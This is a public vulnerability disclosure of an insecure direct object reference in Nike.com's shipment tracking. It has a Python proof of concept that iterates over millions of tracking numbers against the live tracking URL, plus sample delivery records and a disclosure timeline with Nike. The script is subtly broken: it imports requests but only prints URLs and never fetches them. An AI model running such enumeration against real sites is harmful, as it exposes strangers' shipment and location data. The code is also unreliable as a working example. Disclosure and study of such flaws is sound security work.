Exploit Title: Nike.com - Insecure Direct Object Reference (IDOR). Exploit Author: Nir Yehoshua. Exploit Date: 2020-5-27. Link to vulnerable website: https://www.nike.com Category: Web Application. Details: An IDOR vulnerability discovered at Nike.com website that can lead to sensitive information disclosure. Proof of Concept (Python): ============================= #Nike.com IDOR by Nir Yehoshua import requests URL = 'https://secure-global-tracking.nike.com/nike/tracking/%d' def IDOR(): for number in range(6001050010000, 6001056053999): Request(number) def Request(nunber): BaseRequest = URL % nunber print BaseRequest IDOR() Example Data: Date Time Description Location 2020-02-27 13:45 Delivered MORELIA-MEX 2020-02-27 13:13 Out for Delivery MORELIA-MEX 2020-02-26 11:06 Arrived at Transit Hub GUADALAJARA-MEX 2020-02-26 02:00 Customs Released CINCINNATI HUB,OH-USA 2020-02-25 21:35 In Transit to Destination Country BRUSSELS-BEL 2020-02-25 15:31 Departed Origin Country AMSTERDAM-NLD 2020-02-24 18:22 Pending customs release (Please allow 1-2 days) 2020-02-24 11:01 Arrived Destination Region/Country AMS 2020-02-24 10:58 General Update 2020-02-23 16:14 Departed International Hub 2020-02-23 15:59 Arrived International Hub 2020-02-23 11:01 Departed Origin Country AMS 2020-02-23 08:12 Packages Details Received – Awaiting Dispatch NL * Date/Time values are local times where the activity is located Disclosure Timeline: February 26th – Vulnerability reported to Nike. February 28th – Initial response and vulnerability confirmation from Nike. March 4th – Status update from Nike. April 7th – An update email sent to Nike about the intention to disclose the vulnerability. No response from Nike. May 27th – The vulnerability disclosed after 90 days of deadline that has given to Nike to patch the vulnerability.